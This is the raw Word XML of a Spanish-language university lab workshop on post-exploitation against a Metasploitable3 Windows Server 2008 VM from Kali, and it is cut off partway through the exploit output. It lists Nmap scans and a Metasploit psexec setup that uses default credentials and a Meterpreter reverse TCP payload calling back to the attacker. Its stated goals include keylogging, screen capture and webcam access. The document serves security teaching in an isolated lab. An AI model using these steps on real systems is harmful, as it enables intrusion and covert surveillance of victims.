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br/>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="6272A4"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">TALLER DE POST-EXPLOTACIÓN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="44475A"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter sobre Windows Server 2008</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="600" w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6272A4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploitable3 · Kali Linux · Laboratorio de Ciberseguridad</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shd w:fill="282A36" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="50FA7B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Atacante</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
            <w:shd w:fill="F8F8F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Kali Linux ("kali pipe") — 172.28.128.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="282A36" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF5555"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Víctima</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
            <w:shd w:fill="F8F8F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Metasploitable3 win2k8 — Windows Server 2008</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="282A36" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFB86C"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Red</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
            <w:shd w:fill="F8F8F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">172.28.128.0/24 (Host-Only, aislada)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="282A36" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="BD93F9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Credenciales</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
            <w:shd w:fill="F8F8F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">vagrant / vagrant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="282A36" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F1FA8C"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Fecha</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
            <w:shd w:fill="F8F8F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Agosto 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="6272A4" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Objetivos del Taller</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Al finalizar este taller el estudiante será capaz de:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Obtener una sesión Meterpreter sobre un sistema Windows usando credenciales conocidas (psexec).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Transmitir en tiempo real la pantalla del sistema comprometido.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Registrar las pulsaciones de teclado (keylogger) del sistema víctima.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Abrir una consola interactiva remota sobre el sistema comprometido.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Listar y acceder a la cámara web del sistema víctima.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Desplegar un script en la víctima que tome capturas de pantalla automáticamente cada 5 minutos.</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B82F6" w:sz="4"/>
              <w:left w:val="single" w:color="3B82F6" w:sz="16"/>
              <w:bottom w:val="single" w:color="3B82F6" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="EFF6FF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1D4ED8"/>
              </w:rPr>
              <w:t xml:space="preserve">ℹ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="1D4ED8"/>
              </w:rPr>
              <w:t xml:space="preserve">Este taller se realiza en un entorno de laboratorio completamente aislado (sin acceso a internet desde la víctima). El uso de estas técnicas fuera de entornos autorizados es ilegal.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="6272A4" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Preparación del Laboratorio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 Iniciar las máquinas virtuales</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Desde la PC host (Windows), abrir VirtualBox y encender:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">kali pipe — la VM atacante.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Metasploitable3 win2k8 — ejecutar el siguiente comando desde PowerShell o CMD en la carpeta del proyecto:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">cd "C:\Users\pipel\OneDrive\Escritorio\DRIVE\u\8vo semestre\ciberseguridad\Metasploitable\Metasploitable3"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">vagrant up win2k8</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F59E0B" w:sz="4"/>
              <w:left w:val="single" w:color="F59E0B" w:sz="16"/>
              <w:bottom w:val="single" w:color="F59E0B" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="FFFBCC" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="92400E"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠ Nota: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="92400E"/>
              </w:rPr>
              <w:t xml:space="preserve">Si vagrant up falla por espacio en disco, libera al menos 20-30 GB antes de continuar.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 Verificar conectividad</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Desde Kali, confirmar que ambas máquinas están en la misma red:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">ip a   # verificar IP de Kali en 172.28.128.x</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">ping 172.28.128.3   # ub1404 tiene IP fija; win2k8 obtiene IP por DHCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Anotar la IP de Kali (LHOST) — la necesitarás en los módulos de Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">hostname -I | awk '{print $1}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="6272A4" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Reconocimiento con Nmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Descubrir el host win2k8 y sus servicios abiertos:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Descubrimiento de hosts activos en la red del lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sn 172.28.128.0/24</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 Escaneo de puertos sobre la IP de win2k8 (reemplaza X por la IP encontrada)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sV -sC -p 445,3389,80,8080,4848 172.28.128.X -oN scan_win2k8.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Puertos clave esperados en win2k8:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">445/tcp — SMB (usado para psexec)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3389/tcp — RDP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">80/tcp, 8080/tcp — servicios web vulnerables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4848/tcp — GlassFish Admin Console</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F59E0B" w:sz="4"/>
              <w:left w:val="single" w:color="F59E0B" w:sz="16"/>
              <w:bottom w:val="single" w:color="F59E0B" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="FFFBCC" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="92400E"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠ Nota: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="92400E"/>
              </w:rPr>
              <w:t xml:space="preserve">Guarda la IP de win2k8; la llamaremos RHOST en todos los módulos siguientes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="6272A4" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Acceso Inicial — Meterpreter via psexec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Usaremos las credenciales por defecto de Metasploitable3 (vagrant/vagrant) para obtener una sesión Meterpreter con privilegios de SYSTEM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 Lanzar Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 Configurar y ejecutar el exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/windows/smb/psexec</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set RHOSTS 172.28.128.X     # IP de win2k8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">set SMBUser vagrant</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">set SMBPass vagrant</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">set PAYLOAD windows/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">set LHOST 172.28.128.Y      # IP de Kali</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">set LPORT 4444</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exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Si el exploit tiene éxito verás:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Started reverse TCP handler on 172.28.128.Y:4444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] 172.28.128.X:445 - Connecting to the server...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
